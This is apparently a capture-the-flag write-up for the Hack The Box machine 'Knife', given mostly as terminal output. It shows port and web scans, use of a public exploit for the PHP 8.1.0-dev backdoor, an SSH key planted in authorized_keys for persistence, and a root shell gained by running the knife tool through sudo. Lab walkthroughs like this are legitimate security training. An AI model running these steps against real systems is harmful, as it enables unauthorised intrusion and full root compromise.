Knife

Hack The Box Machines No Comments
$ sudo nmap -p- -T4 -A 10.10.10.242
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
$ nikto -h http://10.10.10.242
+ Server: Apache/2.4.41 (Ubuntu)
+ Retrieved x-powered-by header: PHP/8.1.0-dev
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
$ dirb http://10.10.10.242
---- Scanning URL: http://10.10.10.242/ ----
+ http://10.10.10.242/index.php (CODE:200|SIZE:5815)                             
+ http://10.10.10.242/server-status (CODE:403|SIZE:277)
https://www.exploit-db.com/exploits/49933
https://github.com/flast101/php-8.1.0-dev-backdoor-rce
kali@kali:~/0.htb/machines/Knife242$ python3 49933.py 
$ whoami
james

$ cat /home/james/user.txt
dde53b3e0ea16ef76edd6b8474a499fc

$ echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDeYZ9sJVrH4IfMx50cZSfpnsdi98SgU4WtQHUjXcyHsx9jD5RJaviSdt3JijTSP4+ctXbMoZWqv/dDFKSN3N2aG8U2gjhaabAzQU8ICo4Ow/qZNlyNLW4mD7SJK44rmga6c03PsygOH+E0UQpW/cOgUym7Oaj0qYL5caN0q/0b5lJqTsMpxOmUz6+TXFiVH+PjaLb5RJo8YRbGZN51cY9/hFmuXuNuXfGRPNS7VAaun9Cu+tLqgx334GvqriUdU6HxT5N/wkTy4wum/Oi94/o4rzbLTZYhCpQMtm1k1CVht9YO6RpjioB3hUTKR7UKtgBoo6d0fNVZld0kRP8jf9l995/6QOfUGbCK2eHAxKdBqFqa5cdRMezFE1DrVDrNX1dbYHJOs8QFJMp042Q+ecoORleFfhVA5ZtcGTsXkA9peXC9SAkec3PtuUEULXS5ait6hEqQk7Tzps4j8LG+vtL3TTWZDLN/4MVLudWZi8Y4or7yrCTwh7HKFfiWR2NG//E= kali@kali > /home/james/.ssh/authorized_keys
kali@kali:~/0.htb/machines/Knife242$ ssh james@10.10.10.242
james@knife:~$ sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

james@knife:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
... ... 
james:x:1000:1000:james:/home/james:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
opscode:x:997:997::/opt/opscode/embedded:/usr/sbin/nologin
opscode-pgsql:x:996:996::/var/opt/opscode/postgresql:/bin/sh
james@knife:~
james@knife:~$ sudo knife exec --exec "exec '/bin/sh -i' " 
# cat /root/root.txt
b8764300e633b33d84dfb8717bf719b9

Proudly powered by WordPress & Skyrocket Themes

MENU

Navigation